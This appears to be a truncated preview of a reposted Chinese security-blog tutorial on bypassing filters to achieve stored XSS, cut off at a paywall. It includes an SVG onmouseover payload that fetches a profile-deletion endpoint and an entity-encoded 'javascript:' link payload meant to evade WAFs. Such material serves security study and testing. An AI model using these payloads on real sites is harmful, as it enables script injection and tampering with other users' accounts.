存储型 XSS 的若干绕过方法

admin
admin
admin
145176
文章
119
评论
2025年5月30日10:24:46评论16 views字数 613阅读2分2秒阅读模式
目录

  • HTML 过滤绕过
  • 文件上传 XSS 绕过
  • 基于 DOM 的存储型 XSS 绕过
  • CSP 绕过
  • 高级 AngularJS 绕过
  • 持久化隐蔽技巧

HTML 过滤绕过

过滤 <script> 标签

可以尝试使用 <svg> + onload

<!-- Most WAFs miss SVG event handlers --><svgxmlns="http://www.w3.org/2000/svg"width="100"height="100"><circlecx="50"cy="50"r="40"fill="red"onmouseover="fetch('/profile/delete')"/></svg>

过滤器通常允许用于图形的 SVG,但有时会忘记验证事件处理器如 onmouseover

javascript:被过滤

可以尝试使用 &colon; 小技巧:

<!-- Bypass colon filters in href/src -->  <ahref="java&Tab;script&colon;alert(1)">Click Me (Works in Chrome)</a>

真实案例:某CMS系统允许链接中使用 &Tab;(URL编码的制表符)和 &colon;(HTML实体表示冒号)。

onerror 被过滤

大多数 WAF 会阻止 onerror / onload 但会经常忽略...

- 加入星球,畅快阅读 -

原文始发于微信公众号(骨哥说事):【星球专享】存储型 XSS 的若干绕过方法

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月30日10:24:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   存储型 XSS 的若干绕过方法https://cn-sec.com/archives/4114139.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息